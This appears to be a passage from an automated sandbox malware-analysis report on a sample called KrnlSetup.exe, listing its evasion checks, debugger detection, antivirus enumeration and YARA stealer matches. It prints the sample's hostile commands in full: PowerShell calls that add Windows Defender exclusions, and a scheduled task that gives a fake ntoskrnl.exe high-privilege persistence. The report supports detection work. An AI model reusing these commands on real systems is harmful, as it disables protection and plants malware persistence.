                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595964s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595781s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595656s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595523s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595406s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe TID: 3396 Thread sleep time: -595296s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -9223372036854770s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4284 Thread sleep count: 6693 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156 Thread sleep count: 2955 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep time: -7378697629483816s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep count: 8172 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep count: 1446 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4408 Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652 Thread sleep count: 8124 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652 Thread sleep count: 1444 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2756 Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 5552 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 3176 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\ntoskrnl.exe TID: 3588 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\ntoskrnl.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\ntoskrnl.exe File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\ntoskrnl.exe File Volume queried: C:\ FullSizeInformation
                                    Source: KrnlSetup.exe, 00000000.00000002.2625667958.000000001B34A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                                    Source: ntoskrnl.exe.0.dr Binary or memory string: vmware
                                    Source: ntoskrnl.exe.0.dr Binary or memory string: enxBmyNBiTqbFKM7KnjGBF3tc67i7v6AOgMoU2mlWXJM7lL61vjNPbtD2uPliUTJ5vVmCiYWtxNS8Sz70a4wX3aqK3ueT
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process information queried: ProcessInformation

                                    Anti Debugging

                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Code function: 0_2_00007FFD9B787B41 CheckRemoteDebuggerPresent, 0_2_00007FFD9B787B41
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process queried: DebugPort
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                    Source: C:\ProgramData\ntoskrnl.exe Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Memory allocated: page read and write | page guard

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3

                                    Language, Device and Operating System Detection

                                    Source: Yara match File source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara match File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Queries volume information: C:\Users\user\Desktop\KrnlSetup.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: KrnlSetup.exe, 00000000.00000002.2636215682.000000001BDD5000.00000004.00000020.00020000.00000000.sdmp, KrnlSetup.exe, 00000000.00000002.2624968723.000000001B32F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match | File source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
